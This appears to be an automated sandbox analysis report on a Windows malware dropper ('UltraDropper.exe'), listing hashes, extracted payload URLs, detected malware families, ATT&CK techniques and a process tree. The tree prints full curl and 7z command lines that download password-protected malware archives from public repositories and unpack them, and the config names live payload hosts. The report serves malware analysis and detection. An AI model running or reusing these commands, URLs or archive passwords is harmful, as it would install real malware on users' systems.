dcrat | 204f9f28d1c120185e93efa3805acb021947b48c6164318f1c7cfca9d73277a8

Analysis

max time kernel
141s
max time network
148s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
12-12-2024 17:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

UltraDropper.exe
Size

2.1MB
MD5

780a9d4a4fc574831e5c6e5e212c2ca6
SHA1

8120325c5591b3195d9e126e66cf703ee5662b9c
SHA256

204f9f28d1c120185e93efa3805acb021947b48c6164318f1c7cfca9d73277a8
SHA512

4bea8e9c4c94f72c2a372d2132cd6f8bd8b803b73cec82e293ca65ebd22cdde481f6b8efc8e5793a918c7e604f5d2bb8503cb1405817da602dd5d46a7fc5f2d0
SSDEEP

49152:sW2vZKbn0KJrgcvZ4dvTrRpjgYhNWue0CJAop:svZKrJ5vZ4drfgYOfF

Score

10^/10

dcrat eternity privateloader bootkit discovery infostealer loader persistence rat spyware stealer upx

Malware Config

Extracted

Family

eternity

http://eternityms33k74r7iuuxfda4sqsiei3o3lbtr5cpalf6f4skszpruad.onion

Attributes

payload_urls
https://raroford3242.xyz/myupdate.exe

https://raroford3242.xyz/Sklmsstregens.vbs, https://raroford3242.xyz/remcexecrypt.exe, https://raroford3242.xyz/redlcryp.exe, https://raroford3242.xyz/racoocry.exe

https://raroford3242.xyz/myupdate.exe

https://raroford3242.xyz/myupdate.exe

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat
Dcrat family
dcrat
Eternity
Eternity Project is a malware kit offering an info stealer, clipper, worm, coin miner, ransomware, and DDoS bot.
eternity
Eternity family
eternity
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
loader privateloader
Privateloader family
privateloader

Process spawned unexpected child process 36 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4924	1908	schtasks.exe	142
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4560	1908	schtasks.exe	142
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1992	1908	schtasks.exe	142
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2512	1908	schtasks.exe	142
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3596	1908	schtasks.exe	142
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	988	1908	schtasks.exe	142
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	416	1908	schtasks.exe	142
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5084	1908	schtasks.exe	142
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1288	1908	schtasks.exe	142
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3544	1908	schtasks.exe	142
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1204	1908	schtasks.exe	142
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4340	1908	schtasks.exe	142
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1144	1908	schtasks.exe	142
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3960	1908	schtasks.exe	142
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	420	1908	schtasks.exe	142
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1124	1908	schtasks.exe	142
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2464	1908	schtasks.exe	142
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3532	1908	schtasks.exe	142
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4332	1908	schtasks.exe	142
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4648	1908	schtasks.exe	142
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3132	1908	schtasks.exe	142
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3244	1908	schtasks.exe	142
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2456	1908	schtasks.exe	142
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1508	1908	schtasks.exe	142
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4904	1908	schtasks.exe	142
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	236	1908	schtasks.exe	142
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2524	1908	schtasks.exe	142
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2796	1908	schtasks.exe	142
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1036	1908	schtasks.exe	142
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3624	1908	schtasks.exe	142
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5040	1908	schtasks.exe	142
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3576	1908	schtasks.exe	142
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	696	1908	schtasks.exe	142
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1888	1908	schtasks.exe	142
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2416	1908	schtasks.exe	142
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	804	1908	schtasks.exe	142

DCRat payload 3 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

resource	yara_rule
behavioral1/files/0x0003000000000699-99.dat	dcrat
behavioral1/files/0x000400000000ef79-185.dat	dcrat
behavioral1/memory/4500-186-0x0000000000840000-0x000000000098C000-memory.dmp	dcrat

Executes dropped EXE 27 IoCs

pid	Process
1892	ud.curl.exe
420	ud.curl.exe
4644	ud.7z.exe
2112	ud.curl.exe
3576	ud.7z.exe
3372	ud.curl.exe
2456	ud.7z.exe
1292	ud.curl.exe
3436	ud.7z.exe
3144	ud.curl.exe
2004	ud.7z.exe
4672	ud.curl.exe
648	ud.7z.exe
4440	ud.curl.exe
1528	ud.7z.exe
2128	ud.curl.exe
2892	ud.7z.exe
1064	ud.curl.exe
3104	ud.7z.exe
2708	[email protected]
1124	Genshin Impact.exe
1132	[email protected]
2012	setup.eexe
3744	Worm (1).exe
4992	setup.exe
3720	Install.exe
1560	302746537.exe

Loads dropped DLL 8 IoCs

pid	Process
4644	ud.7z.exe
3576	ud.7z.exe
3436	ud.7z.exe
2004	ud.7z.exe
648	ud.7z.exe
1528	ud.7z.exe
2892	ud.7z.exe
3104	ud.7z.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000\Software\Microsoft\Windows\CurrentVersion\Run\AntiVirus Pro 2017 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ultradrp\\[email protected]"	[email protected]

Enumerates connected drives 3 TTPs 21 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\K:	[email protected]
File opened (read-only)	\??\O:	[email protected]
File opened (read-only)	\??\Q:	[email protected]
File opened (read-only)	\??\R:	[email protected]
File opened (read-only)	\??\W:	[email protected]
File opened (read-only)	\??\Y:	[email protected]
File opened (read-only)	\??\T:	[email protected]
File opened (read-only)	\??\V:	[email protected]
File opened (read-only)	\??\E:	[email protected]
File opened (read-only)	\??\H:	[email protected]
File opened (read-only)	\??\I:	[email protected]
File opened (read-only)	\??\J:	[email protected]
File opened (read-only)	\??\L:	[email protected]
File opened (read-only)	\??\N:	[email protected]
File opened (read-only)	\??\G:	[email protected]
File opened (read-only)	\??\S:	[email protected]
File opened (read-only)	\??\U:	[email protected]
File opened (read-only)	\??\Z:	[email protected]
File opened (read-only)	\??\M:	[email protected]
File opened (read-only)	\??\P:	[email protected]
File opened (read-only)	\??\X:	[email protected]

Legitimate hosting services abused for malware hosting/C2 1 TTPs 10 IoCs

Web Service

T1102

flow	ioc
42	raw.githubusercontent.com
46	raw.githubusercontent.com
1	raw.githubusercontent.com
3	raw.githubusercontent.com
10	raw.githubusercontent.com
14	raw.githubusercontent.com
39	raw.githubusercontent.com
24	raw.githubusercontent.com
30	raw.githubusercontent.com
51	raw.githubusercontent.com

Looks up external IP address via web service 5 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
37	ipinfo.io
37	api.db-ip.com
55	ipinfo.io
57	api.db-ip.com
61	ip-api.com

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	[email protected]

Drops file in System32 directory 4 IoCs

description	ioc	Process
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	Install.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	Install.exe
File opened for modification	C:\Windows\System32\GroupPolicy	Install.exe
File opened for modification	C:\Windows\SysWOW64\GroupPolicy\gpt.ini	Install.exe

UPX packed file 5 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000400000000f4c4-144.dat	upx
behavioral1/memory/1560-160-0x0000000000400000-0x0000000000410000-memory.dmp	upx
behavioral1/files/0x000500000000f43f-177.dat	upx
behavioral1/memory/2788-178-0x0000000000400000-0x000000000040D000-memory.dmp	upx
behavioral1/memory/1560-188-0x0000000000400000-0x0000000000410000-memory.dmp	upx

Drops file in Windows directory 9 IoCs

description	ioc	Process
File created	C:\Windows\__tmp_rar_sfx_access_check_240768968	[email protected]
File created	C:\Windows\MSCOMCTL.OCX	[email protected]
File opened for modification	C:\Windows\MSCOMCTL.OCX	[email protected]
File opened for modification	C:\Windows\302746537.exe	[email protected]
File created	C:\Windows\302746537.exe	[email protected]
File created	C:\Windows\antivirus-platinum.exe	[email protected]
File opened for modification	C:\Windows\antivirus-platinum.exe	[email protected]
File created	C:\Windows\COMCTL32.OCX	[email protected]
File opened for modification	C:\Windows\COMCTL32.OCX	[email protected]

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 51 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ud.7z.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ud.curl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ud.7z.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ud.curl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ud.7z.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	UltraDropper.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	setup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	302746537.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ud.curl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ud.curl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ud.7z.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ud.curl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regsvr32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ud.curl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ud.curl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ud.7z.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	setup.eexe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Genshin Impact.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ud.curl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ud.7z.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ud.7z.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ud.curl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ud.7z.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ud.curl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Worm (1).exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Install.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ud.7z.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings	Genshin Impact.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 36 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3544	schtasks.exe
1204	schtasks.exe
4332	schtasks.exe
5084	schtasks.exe
4904	schtasks.exe
236	schtasks.exe
804	schtasks.exe
2416	schtasks.exe
1288	schtasks.exe
3532	schtasks.exe
3244	schtasks.exe
2456	schtasks.exe
4560	schtasks.exe
1992	schtasks.exe
1144	schtasks.exe
3132	schtasks.exe
1036	schtasks.exe
2512	schtasks.exe
3596	schtasks.exe
1508	schtasks.exe
2796	schtasks.exe
696	schtasks.exe
988	schtasks.exe
416	schtasks.exe
4340	schtasks.exe
2524	schtasks.exe
4924	schtasks.exe
2464	schtasks.exe
4648	schtasks.exe
5040	schtasks.exe
3576	schtasks.exe
1888	schtasks.exe
3960	schtasks.exe
420	schtasks.exe
1124	schtasks.exe
3624	schtasks.exe

Suspicious behavior: EnumeratesProcesses 28 IoCs

pid	Process
3720	Install.exe
3720	Install.exe
3720	Install.exe
3720	Install.exe
3720	Install.exe
3720	Install.exe
3720	Install.exe
3720	Install.exe
3720	Install.exe
3720	Install.exe
3720	Install.exe
3720	Install.exe
3720	Install.exe
3720	Install.exe
3720	Install.exe
3720	Install.exe
3720	Install.exe
3720	Install.exe
3720	Install.exe
3720	Install.exe
3720	Install.exe
3720	Install.exe
3720	Install.exe
3720	Install.exe
3720	Install.exe
3720	Install.exe
3720	Install.exe
3720	Install.exe

Suspicious use of AdjustPrivilegeToken 33 IoCs

description	pid	Process
Token: SeRestorePrivilege	4644	ud.7z.exe
Token: 35	4644	ud.7z.exe
Token: SeSecurityPrivilege	4644	ud.7z.exe
Token: SeSecurityPrivilege	4644	ud.7z.exe
Token: SeRestorePrivilege	3576	ud.7z.exe
Token: 35	3576	ud.7z.exe
Token: SeSecurityPrivilege	3576	ud.7z.exe
Token: SeSecurityPrivilege	3576	ud.7z.exe
Token: SeRestorePrivilege	3436	ud.7z.exe
Token: 35	3436	ud.7z.exe
Token: SeSecurityPrivilege	3436	ud.7z.exe
Token: SeSecurityPrivilege	3436	ud.7z.exe
Token: SeRestorePrivilege	2004	ud.7z.exe
Token: 35	2004	ud.7z.exe
Token: SeSecurityPrivilege	2004	ud.7z.exe
Token: SeSecurityPrivilege	2004	ud.7z.exe
Token: SeRestorePrivilege	648	ud.7z.exe
Token: 35	648	ud.7z.exe
Token: SeSecurityPrivilege	648	ud.7z.exe
Token: SeSecurityPrivilege	648	ud.7z.exe
Token: SeRestorePrivilege	1528	ud.7z.exe
Token: 35	1528	ud.7z.exe
Token: SeSecurityPrivilege	1528	ud.7z.exe
Token: SeSecurityPrivilege	1528	ud.7z.exe
Token: SeRestorePrivilege	2892	ud.7z.exe
Token: 35	2892	ud.7z.exe
Token: SeSecurityPrivilege	2892	ud.7z.exe
Token: SeSecurityPrivilege	2892	ud.7z.exe
Token: SeRestorePrivilege	3104	ud.7z.exe
Token: 35	3104	ud.7z.exe
Token: SeSecurityPrivilege	3104	ud.7z.exe
Token: SeSecurityPrivilege	3104	ud.7z.exe
Token: SeDebugPrivilege	3744	Worm (1).exe

Suspicious use of FindShellTrayWindow 3 IoCs

pid	Process
2708	[email protected]
2708	[email protected]
2708	[email protected]

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
2708	[email protected]
2708	[email protected]
2708	[email protected]

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
2708	[email protected]
2708	[email protected]

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2820 wrote to memory of 2744	2820	UltraDropper.exe	78
PID 2820 wrote to memory of 2744	2820	UltraDropper.exe	78
PID 2820 wrote to memory of 2744	2820	UltraDropper.exe	78
PID 2744 wrote to memory of 1892	2744	cmd.exe	79
PID 2744 wrote to memory of 1892	2744	cmd.exe	79
PID 2744 wrote to memory of 1892	2744	cmd.exe	79
PID 2820 wrote to memory of 4592	2820	UltraDropper.exe	80
PID 2820 wrote to memory of 4592	2820	UltraDropper.exe	80
PID 2820 wrote to memory of 4592	2820	UltraDropper.exe	80
PID 4592 wrote to memory of 420	4592	cmd.exe	81
PID 4592 wrote to memory of 420	4592	cmd.exe	81
PID 4592 wrote to memory of 420	4592	cmd.exe	81
PID 4592 wrote to memory of 4644	4592	cmd.exe	82
PID 4592 wrote to memory of 4644	4592	cmd.exe	82
PID 4592 wrote to memory of 4644	4592	cmd.exe	82
PID 2820 wrote to memory of 2780	2820	UltraDropper.exe	83
PID 2820 wrote to memory of 2780	2820	UltraDropper.exe	83
PID 2820 wrote to memory of 2780	2820	UltraDropper.exe	83
PID 2780 wrote to memory of 2112	2780	cmd.exe	84
PID 2780 wrote to memory of 2112	2780	cmd.exe	84
PID 2780 wrote to memory of 2112	2780	cmd.exe	84
PID 2780 wrote to memory of 3576	2780	cmd.exe	85
PID 2780 wrote to memory of 3576	2780	cmd.exe	85
PID 2780 wrote to memory of 3576	2780	cmd.exe	85
PID 2820 wrote to memory of 4224	2820	UltraDropper.exe	86
PID 2820 wrote to memory of 4224	2820	UltraDropper.exe	86
PID 2820 wrote to memory of 4224	2820	UltraDropper.exe	86
PID 4224 wrote to memory of 3372	4224	cmd.exe	87
PID 4224 wrote to memory of 3372	4224	cmd.exe	87
PID 4224 wrote to memory of 3372	4224	cmd.exe	87
PID 4224 wrote to memory of 2456	4224	cmd.exe	88
PID 4224 wrote to memory of 2456	4224	cmd.exe	88
PID 4224 wrote to memory of 2456	4224	cmd.exe	88
PID 2820 wrote to memory of 1484	2820	UltraDropper.exe	89
PID 2820 wrote to memory of 1484	2820	UltraDropper.exe	89
PID 2820 wrote to memory of 1484	2820	UltraDropper.exe	89
PID 1484 wrote to memory of 1292	1484	cmd.exe	90
PID 1484 wrote to memory of 1292	1484	cmd.exe	90
PID 1484 wrote to memory of 1292	1484	cmd.exe	90
PID 1484 wrote to memory of 3436	1484	cmd.exe	91
PID 1484 wrote to memory of 3436	1484	cmd.exe	91
PID 1484 wrote to memory of 3436	1484	cmd.exe	91
PID 2820 wrote to memory of 1440	2820	UltraDropper.exe	92
PID 2820 wrote to memory of 1440	2820	UltraDropper.exe	92
PID 2820 wrote to memory of 1440	2820	UltraDropper.exe	92
PID 1440 wrote to memory of 3144	1440	cmd.exe	93
PID 1440 wrote to memory of 3144	1440	cmd.exe	93
PID 1440 wrote to memory of 3144	1440	cmd.exe	93
PID 1440 wrote to memory of 2004	1440	cmd.exe	94
PID 1440 wrote to memory of 2004	1440	cmd.exe	94
PID 1440 wrote to memory of 2004	1440	cmd.exe	94
PID 2820 wrote to memory of 2392	2820	UltraDropper.exe	95
PID 2820 wrote to memory of 2392	2820	UltraDropper.exe	95
PID 2820 wrote to memory of 2392	2820	UltraDropper.exe	95
PID 2392 wrote to memory of 4672	2392	cmd.exe	96
PID 2392 wrote to memory of 4672	2392	cmd.exe	96
PID 2392 wrote to memory of 4672	2392	cmd.exe	96
PID 2392 wrote to memory of 648	2392	cmd.exe	97
PID 2392 wrote to memory of 648	2392	cmd.exe	97
PID 2392 wrote to memory of 648	2392	cmd.exe	97
PID 2820 wrote to memory of 3080	2820	UltraDropper.exe	98
PID 2820 wrote to memory of 3080	2820	UltraDropper.exe	98
PID 2820 wrote to memory of 3080	2820	UltraDropper.exe	98
PID 3080 wrote to memory of 4440	3080	cmd.exe	99

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4492	attrib.exe

C:\Users\Admin\AppData\Local\Temp\UltraDropper.exe
"C:\Users\Admin\AppData\Local\Temp\UltraDropper.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2820
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Users\Admin\AppData\Local\Temp\ud.curl.exe -L -o "C:\Users\Admin\AppData\Local\Temp\Emotet-Epoch5.zip" "https://github.com/Princekin/malware-database/raw/main/Emotet/Emotet%20(Epoch5)%20-%2004.11.2022%20.zip" --ssl-no-revoke && "C:\Users\Admin\AppData\Local\Temp\ud.7z.exe" x "C:\Users\Admin\AppData\Local\Temp\Emotet-Epoch5.zip" -p"infected" -o"C:\Users\Admin\AppData\Local\Temp\ultradrp"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2744
- - C:\Users\Admin\AppData\Local\Temp\ud.curl.exe
    C:\Users\Admin\AppData\Local\Temp\ud.curl.exe -L -o "C:\Users\Admin\AppData\Local\Temp\Emotet-Epoch5.zip" "https://github.com/Princekin/malware-database/raw/main/Emotet/Emotet%20(Epoch5)%20-%2004.11.2022%20.zip" --ssl-no-revoke
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:1892
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Users\Admin\AppData\Local\Temp\ud.curl.exe -L -o "C:\Users\Admin\AppData\Local\Temp\AntivirusPro2017.zip" "https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/Antivirus%20Pro%202017.zip" --ssl-no-revoke && "C:\Users\Admin\AppData\Local\Temp\ud.7z.exe" x "C:\Users\Admin\AppData\Local\Temp\AntivirusPro2017.zip" -p"mysubsarethebest" -o"C:\Users\Admin\AppData\Local\Temp\ultradrp"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4592
- - C:\Users\Admin\AppData\Local\Temp\ud.curl.exe
    C:\Users\Admin\AppData\Local\Temp\ud.curl.exe -L -o "C:\Users\Admin\AppData\Local\Temp\AntivirusPro2017.zip" "https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/Antivirus%20Pro%202017.zip" --ssl-no-revoke
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:420
- - C:\Users\Admin\AppData\Local\Temp\ud.7z.exe
    "C:\Users\Admin\AppData\Local\Temp\ud.7z.exe" x "C:\Users\Admin\AppData\Local\Temp\AntivirusPro2017.zip" -p"mysubsarethebest" -o"C:\Users\Admin\AppData\Local\Temp\ultradrp"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:4644
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Users\Admin\AppData\Local\Temp\ud.curl.exe -L -o "C:\Users\Admin\AppData\Local\Temp\AntivirusPlatinum.zip" "https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/Antivirus%20Platinum.zip" --ssl-no-revoke && "C:\Users\Admin\AppData\Local\Temp\ud.7z.exe" x "C:\Users\Admin\AppData\Local\Temp\AntivirusPlatinum.zip" -p"mysubsarethebest" -o"C:\Users\Admin\AppData\Local\Temp\ultradrp"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2780
- - C:\Users\Admin\AppData\Local\Temp\ud.curl.exe
    C:\Users\Admin\AppData\Local\Temp\ud.curl.exe -L -o "C:\Users\Admin\AppData\Local\Temp\AntivirusPlatinum.zip" "https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/Antivirus%20Platinum.zip" --ssl-no-revoke
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:2112
- - C:\Users\Admin\AppData\Local\Temp\ud.7z.exe
    "C:\Users\Admin\AppData\Local\Temp\ud.7z.exe" x "C:\Users\Admin\AppData\Local\Temp\AntivirusPlatinum.zip" -p"mysubsarethebest" -o"C:\Users\Admin\AppData\Local\Temp\ultradrp"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:3576
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Users\Admin\AppData\Local\Temp\ud.curl.exe -L -o "C:\Users\Admin\AppData\Local\Temp\RegistrySmart.zip" "https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/RegistrySmart.zip" && "C:\Users\Admin\AppData\Local\Temp\ud.7z.exe" --ssl-no-revoke x "C:\Users\Admin\AppData\Local\Temp\RegistrySmart.zip" -p"mysubsarethebest" -o"C:\Users\Admin\AppData\Local\Temp\ultradrp"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4224
- - C:\Users\Admin\AppData\Local\Temp\ud.curl.exe
    C:\Users\Admin\AppData\Local\Temp\ud.curl.exe -L -o "C:\Users\Admin\AppData\Local\Temp\RegistrySmart.zip" "https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/RegistrySmart.zip"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:3372
- - C:\Users\Admin\AppData\Local\Temp\ud.7z.exe
    "C:\Users\Admin\AppData\Local\Temp\ud.7z.exe" --ssl-no-revoke x "C:\Users\Admin\AppData\Local\Temp\RegistrySmart.zip" -p"mysubsarethebest" -o"C:\Users\Admin\AppData\Local\Temp\ultradrp"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:2456
- C:\Windows\SysWOW64\cmd.exe
